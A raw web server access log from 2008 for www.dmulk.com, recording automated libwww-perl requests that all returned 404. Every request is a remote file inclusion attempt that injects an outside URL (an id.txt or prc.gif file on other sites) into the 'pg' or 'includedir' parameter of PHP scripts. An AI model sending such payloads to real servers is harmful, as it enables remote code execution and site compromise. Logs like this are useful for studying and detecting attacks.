75.125.14.50 - - [10/Nov/2008:09:47:19 -0800] "GET /logs/access_080912.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:47:21 -0800] "GET /logs/access_080912.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:47:21 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:47:21 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.156 - - [10/Nov/2008:09:47:22 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
